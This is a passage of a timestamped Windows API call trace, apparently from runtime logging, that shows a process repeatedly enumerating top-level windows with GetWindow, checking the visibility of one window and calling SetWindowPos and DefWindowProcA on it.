GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.514] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.514] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.514] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.514] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.514] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.514] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.514] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.514] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.514] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.514] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.514] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.514] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.514] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.515] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.515] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.515] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.515] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.515] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.515] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.515] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.515] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.515] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.515] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.515] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.515] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.515] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.515] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.515] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.515] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.515] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.515] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.515] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.515] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.515] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.515] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.515] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.515] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.515] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.515] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.515] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.515] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.515] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.515] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.515] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.515] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.516] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.516] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.516] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.516] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.516] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.516] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.516] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.516] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.516] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.516] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.516] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.516] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.516] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.516] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.516] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.516] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.516] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.516] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.516] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.516] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.516] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.516] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.516] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.516] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.516] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.516] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.516] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.516] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.516] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.516] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.516] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.517] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.517] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.517] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.517] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.517] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.517] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.517] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.517] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.517] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.517] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.517] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.517] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.517] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.517] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.517] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.517] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.517] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.517] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.517] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.517] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.517] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.517] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.517] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.517] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.517] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.517] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.517] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.517] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.517] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.517] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.517] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.517] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.518] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.518] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.518] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.518] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.518] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.518] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.518] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.518] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.518] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.518] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.518] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.518] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.518] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.518] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.518] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.518] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.518] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.518] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.518] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.518] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.518] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.518] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.518] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.518] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.518] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.518] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.518] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.518] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.519] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.519] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.519] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.519] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.519] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.519] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.519] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.519] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.519] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.519] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.519] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.519] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.519] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.519] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.519] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.519] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.519] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.519] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.519] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.519] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.519] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.519] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.519] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.519] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.519] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.520] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.520] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.520] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.520] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.520] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.520] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.520] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.520] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.520] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.520] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.520] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.520] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.520] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.520] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.520] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.520] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.520] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.520] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.520] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.520] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.520] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.520] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.520] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.520] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.521] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.521] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.521] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.521] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.521] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.521] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.521] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.521] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.521] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.521] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.521] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.521] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.521] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.521] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.521] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.521] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.521] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.521] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.521] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.521] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.521] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.521] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.521] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.521] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.521] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.522] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.522] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.522] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.522] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.522] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.522] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.522] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.522] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.522] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.522] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.522] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.522] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.522] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.522] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.522] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.522] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.523] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.523] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.523] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.523] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.523] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.523] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.523] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.523] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.523] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.523] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.523] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.523] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.523] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.523] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.523] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.523] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.523] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.523] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.523] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.524] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.524] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.524] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.524] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.524] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.524] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.524] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.524] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.524] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.524] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.524] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.524] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.524] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.524] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.524] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.524] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.524] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.524] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.524] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.524] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.524] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.524] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.524] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.524] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.524] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.524] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.524] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.524] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.524] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.524] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.524] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.525] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.525] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.525] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.525] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.525] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.525] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.525] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.525] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.525] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.525] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.525] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.525] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.525] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.525] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.525] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.525] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.525] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.525] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.525] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.525] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.525] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.525] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.525] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.525] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.525] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.525] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.525] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.525] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.525] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.525] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.525] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.525] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.526] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.526] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.526] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.526] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.526] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.526] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.526] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.526] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.526] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.526] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.526] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.526] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.526] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.526] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.526] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.526] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.526] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.526] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.526] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.526] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.526] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.526] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.526] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.526] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.526] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.526] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.526] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.526] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.526] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.526] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.526] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.527] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.527] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.527] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.527] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.527] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.527] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.527] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.527] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.527] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.527] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.527] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.527] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.527] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.527] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.527] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.527] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.527] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.527] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.527] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.527] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.527] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.527] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.527] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.527] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.527] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.527] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.527] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.527] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.527] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.528] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.528] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.528] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.528] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa 